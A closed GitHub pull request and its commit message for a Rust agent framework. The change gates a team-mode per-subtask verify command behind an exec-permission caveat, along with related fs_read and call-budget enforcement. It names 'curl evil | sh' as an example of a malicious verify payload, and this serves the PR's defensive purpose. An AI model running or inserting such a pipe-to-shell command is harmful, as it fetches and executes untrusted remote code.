Skip to content

feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765

Closed
hartsock wants to merge 1 commit into
feat/ocap-4-crew-budgetfrom
feat/ocap-5-team-verify
Closed

feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765
hartsock wants to merge 1 commit into
feat/ocap-4-crew-budgetfrom
feat/ocap-5-team-verify

Conversation

@hartsock

Copy link
Copy Markdown
Member

OCAP enforcement-floor stack — PR 5 of 8 · epic #749

Stacked on step 4 (#760). Review/merge after #760. This completes the core complete-mediation (steps 2–5): the .meet() seam + enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.

What this does

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with no exec check — a malicious verify (curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).

Test plan

denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@hartsock

Copy link
Copy Markdown
Member Author

Superseded by #781 — steps 3–6 collapsed onto current main after #751 merged + auto-closed the stack. Code is identical; review/merge there.

@hartsock hartsock closed this Jun 29, 2026
hartsock added a commit that referenced this pull request Jun 29, 2026
…lls, team-verify, clamp grammar (#749) (#781)

* feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read
navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the
navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the
permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never
passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read
caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is
not read, the in-scope one is (red on today's code — both read; green after). just check green
(52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read
scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by
cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults
caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the
budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success).
The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is
now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default)
leaves unclamped crews unchanged.

net: documented in-code — the crew loop has no direct net effect a permits_net check could gate;
net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate
(per-axis complete mediation: this axis needs a sandbox, not a call-site).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with
max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green —
0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could
not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though
CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec>
(serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile
lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp —
follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity;
default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default —
flipping it would break back-compat for every preset consumer).

TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat
(omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test
fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com>
Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@hartsock hartsock deleted the feat/ocap-5-team-verify branch June 29, 2026 23:26
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

ocap Object-capability / authority-security; pending full design review

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant